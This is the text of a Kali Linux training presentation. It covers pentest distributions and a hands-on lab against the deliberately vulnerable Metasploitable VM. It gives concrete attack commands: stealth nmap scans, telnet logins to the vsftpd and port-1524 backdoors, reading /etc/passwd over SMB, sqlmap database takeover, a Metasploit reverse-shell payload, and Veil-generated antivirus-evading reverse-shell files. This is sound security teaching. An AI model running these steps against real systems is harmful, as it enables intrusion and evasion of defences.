3. Welcome
Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
System Forensics.
5. Welcome
Side Note:
I put a lot of extra materials, websites, &
definitions in the âNotesâ section of this PPT.
6. Overview of Presentation
Intro, Description, How used, Background
Extra Info, Kali in a Box, Raspberry PI
Tools, Overview, & Conclusion
Setting up the Environments
CLI 101 / Tools 101
Kali 101, 201, & 301
9. Who is Kali?
Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!
Anu Yadavalli
11. What is Kali Linux?
Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.
12. BackTrack?
Kali Linux is the ârebirthâ of BackTrack
Linux. This is a custom distribution
designed for security testing for all skill
levels from novice to expert. It is the
largest collection of wireless hacking,
server exploiting, web application
assessing, social-engineering tools available
in a single Linux distribution.
13. Developers - March 12, 2013
âSeven years of developing BackTrack
Linux has taught us a significant amount
about what we, and the security
community, think a penetration testing
distribution should look like. Weâve taken all
of this knowledge and experience and
implemented it in our ânext generationâ
penetration testing distribution.â
14. Developers - March 12, 2013
âAfter a year of silent development,
we are incredibly proud to announce the
release and public availability of âKali
Linuxâ, the most advanced, robust, and
stable penetration testing distribution to
date.
Kali is a more mature, secure, and
enterprise-ready version of BackTrack
Linux.â
15. Warning! Warning!
Kali Linuxâs developers would like
everyone to use Kali Linux. But, Kali is a
Linux distribution specifically geared
towards professional penetration testing
and security auditing and as such. It is NOT
a recommended distribution for those
unfamiliar with Linux.
16. Hardware / Software
Kali likes its own dedicated hardware.
If you are learning about Kali and
penetration testing (Metaspolitable) then a
virtualized environment may be a
consideration. VMware Player 5 works well
and set the RAM to 1gb.
17. Hardware / Software
Kali recommends 10gb for the initial
install, 512MB RAM min, i386/AMD64,
CD/DVD / USB support.
NowâŠif âVeilâ is installed (+ 10gb) and
doing the updates/upgrades (+ 5gb), and
donât forget the Alfa antenna.
22. Other guys? BackBox
BackBox is an Ubuntu-based
distribution developed to perform
penetration tests and security assessments.
It provides a minimal yet complete desktop
environment, thanks to its own software
repositories, which are always updated to
the latest stable versions of the most often
used and best-known ethical hacking tools.
23. Other guys? Pentoo
Pentoo is a Live CD/USB designed for
penetration testing and security
assessment. Based on Gentoo, it is
provided both as 32/64 bit installable
livecd. It features packet injection patched
wifi drivers, GPGPU cracking software, and
lots of tools for penetration testing and
security assessment.
24. Other guys? BlackBuntu
BlackBuntu is distribution for
penetration testing which was specially
designed for security training students and
practitioners of information security.
Blackbuntu is penetration testing
distribution with GNOME Desktop
Environment. It's currently being built
using the Ubuntu 10.10.
25. Other guys? EnGarde
EnGarde Secure Linux was designed to
support features suitable for individuals,
students, security enthusiasts, and those
wishing to evaluate the level of security and
ease of management available in Guardian
Digital enterprise products.
39. Kali in a box?
Do you want to run Kali on tablet or phone?
http://www.kali.org/how-to/kali-linux-android-linux-deploy/
40. Kali in a box?
BasicallyâŠ.
1.Get a tablet
1. Install âLinux Deployâ
2. Install Samsung Kies on PC
3. Tablet - USB Debugging ON
4. Install SuperOneClick on PC
5. Wait 5 minutesâŠ
6. Done
41. Kali + Nexus = NetHunter
Do you want to run Kali on a Nexus?
http://www.kali.org/kali-linux-nethunter/
43. Kali & Lifehacker
How to hack your own network and beef up
its security with Kali Linux
http://lifehacker.com/how-to-hack-your-own-network-and-
beef-up-its-security-w-1649785071
48. Metaspolitable?
Metasploitable is an intentionally
vulnerable Linux virtual machine. This VM
can be used to conduct security training,
test security tools, and practice common
penetration testing techniques.
The default login and password is
msfadmin:msfadmin
50. Whatâs on the Drive?
ï/books
âŠOfficial Kali Guide
âŠeForensics
âŠOther published materials
ï/media
âŠ7-Zip, kali_iso, metaspolitable doc,
SD_formatter, Unetbootin, USB_installer,
VMware, Win32_DiskImager
ï/PPT
51. Legend
ï Weâre going to type something
ï Weâre going to make a note
ï Might be a question?
ï Weâre going to click on something
ï Recon ï Attack
52. traceroute
ï traceroute
Essentially, âtracertâ in Windows
ï traceroute âi eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
54. nmap
ï
nmap âp0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
56. nmap
ï
nmap âsS âPn âA <Target IP>
A security scanner used to discover hosts and services on a
computer network â âsSâ is stealth scan, âPnâ not to run a ping scan,
and âAâ is O/S detection, services, service pack.
58. rpcinfo
ï
rpcinfo âp <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
61. nikto
On Kali
ï nikto âh <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
72. veil
Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
82. Getting ReadyâŠ
- Letâs make a folder called ï kali_2015
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Letâs make sure the virtual environments are working and can âpingâ
each other
83. VMware Player
Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
applications.
87. Kali V/E
ï Login ï root
ï Password ï password
ï ifconfig
ï Jot down the IP & Netmask
ï route
ï Jot down the Gateway
88. Kali V/E
Go to:
Applications ï System Tools
ï Preferences ï System Settings
ï Display ï Resolution: ____
ThenâŠ[Apply]
89. Kali Updating
From the command line, type ï
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done
after a new installation.
92. Legend
ï Weâre going to type something
ï Weâre going to make a note
ï Might be a question?
ï Weâre going to click on something
ï Recon ï Attack
93. ping
ï ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities
ï (from Kali) ping <Target IP>
Did it echo back?
94. top
ï top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor
103. traceroute
ï traceroute
Essentially, âtracertâ in Windows
ï traceroute âi eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
104. nmap
ï
nmap âp0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
105. nmap
ï
nmap âsS âPn âA <Target IP>
A security scanner used to discover hosts and services on a
computer network â âsSâ is stealth scan, âPnâ not to run a ping scan,
and âAâ is O/S detection, services, service pack.
106. rlogin (from Metaspolitable)
ï rlogin âl root <Target IP>
ï whoami
ï tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
attached.
107. rpcinfo
ï
rpcinfo âp <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
108. showmount
ï showmount âe <Target IP>
ï showmount âa <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
109. telnet
ï telnet <Target IP> 21
After '220...'
ï user backdoored:)
ï <CTRL><]>
ï quit
Port 20/21 is FTP
110. telnet
ï telnet <Target IP> 6200
After 'Escape character...',
ï id;
ï <CTRL><]>
ï quit
Port 6200 - Oracle Notification Service remote port Oracle Application Server
111. telnet
ï telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
112. telnet
ï telnet <Target IP> 1524
After 'root@meta....',
ï id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
116. smbclient
ï smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
ï cd rootfs
ï cd etc
ï more passwd
Do you get a list of all user accts?
117. tcpdump
On KaliâŠ
tcpdump âI eth0 src <Target IP>
On MetaspolitableâŠ
ping www.yahoo.com
open a Browser & go to CNN.com
118. netdiscover
On Kali
netdiscover âi eth0 âr <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.
119. nikto
On Kali
ï nikto âh <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
120. sqlmap
On Kali
sqlmap âu http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database
servers.
121. Wasp Services
From Kali â open IceWeasel
ï http://<Target IP>/
Research: Multillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name âvelvet antâ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
122. Web Services
From Kali â open IceWeasel
ï http://<Target IP>/
Research: Multillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiest to pen-test and hack a web application
123. whatweb
From Kali
ï whatweb <Target IP>
ï whatweb âv <Target IP>
ï whatweb âa 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
125. From Kali - msfconsole
Presentation on Kali Linux
126. msfconsole
From Kali
ï service postgresql start
ï service metasploit start
ï msfconsole
Letâs fire up the database (PostGreSql) â start Metasploit â start msfconsole
We will then take a look at the built-in exploit tools
127. msfconsole
From [msf>] console
ï help search
ï show exploits
ï search dns
âHelp Searchâ shows all of the options, âShow Exploitsâ show all the built-in
exploits in msfconsole, âSearch DNSâ will look for any DNS exploits.
128. msfconsole
From [msf>] console
ï search Microsoft
ï search diablo
ï search irc
ï search http
Letâs try a few more to see what they doâŠ.
129. msfconsole
From [msf>] console, search for âunrealâ
ï info <exploit>
ï use <exploit>
ï show options
ï LHOST, RHOST, LPORT, RPORT
135. msfconsole
From [msf>] console, (target: Win XP)
ï set payload windows/shell_reverse_tcp
ï show options
ï set LHOST <Kali IP Address>
ï set RHOST <Target IP Address>
142. recon-ng
Kali has many built-in tools, but you
can always install more (Debian-based).
But, you may always wish to add more
such as recon-ng.
recon-ng
automated info gathering and
network reconnaissance.
143. recon-ng
Letâs run recon-ngâŠ
ï cd /opt/recon-ng
ï /usr/bin/python recon-ng
ï show modules
ï recon/hosts/gather/http/web/google_site
144. recon-ng
Letâs run recon-ngâŠ
ï set DOMAIN <domain.com>
ï run (âŠlet this run awhileâŠ)
ï back (âŠprevious levelâŠ)
ï show modules
146. dmitry
If you want something more basicâŠdmitry
ï dmitry âs <domain.com>
ï It gives you site names & IPâs
147. veil
Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
148. veil
Letâs run veil
ï veil-evasion
ï list (available payloads list)
ï use 13 (powershell/VirtualAlloc)
ï generate
149. veil
Letâs run veil
ï 1 (msfvenom)
ï [ENTER] (accept default)
ï Value for LHOST (Target IP)
ï Value for LPORT (ex: 4000)
150. veil
Letâs run veil
ï Output name (âSquatchâ)
ï It will store this new batch file to
the ï /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.